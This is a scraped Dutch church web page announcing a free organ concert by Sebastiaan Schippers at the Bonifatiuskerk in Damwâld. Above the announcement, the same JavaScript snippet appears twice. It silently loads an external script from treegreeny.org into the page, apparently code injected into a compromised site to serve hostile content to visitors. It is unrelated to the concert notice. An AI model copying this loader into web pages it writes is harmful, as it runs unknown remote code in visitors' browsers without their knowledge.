;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Orgelconcert Bonifatiuskerk Damwâld - PKN Damwâld

Orgelconcert Bonifatiuskerk Damwâld

Gepubliceerd op: donderdag 25 oktober 2018

Zaterdag 17 november a.s. zal er een orgelconcert worden gegeven in de Bonifatiuskerk in Damwâld. Aanvang 19.30 uur.

De bekende organist Sebastiaan Schippers (ook bekend van You Tube) zal op deze avond diverse werken ten gehore brengen op het onlangs geïnstalleerde elektronische orgel. Voor deze gelegenheid zal bij het slot van dit concert, het orgel nog worden uitgebreid met een Allen stemmenbank, waarbij het orgel uitgroeit tot een enorm groot orgel met Spaanse trompetten en 32 vt.bazuin in het pedaal enz.

Er zal tevens gelegenheid zijn tot samenzang. Ook kunt u voor de aanvang van het concert verzoeknummers opgeven bij Sebastiaan Schippers. Dit concert wordt georganiseerd door dhr. Henk Loonstra, leverancier van het orgel. De toegang is gratis.

Dus als u van orgelmuziek houdt, is dit de gelegenheid. Noteer dus de bovenstaande datum en tijd in uw agenda.

Namens dhr. Henk Loonstra en het college van Kerkrentmeesters.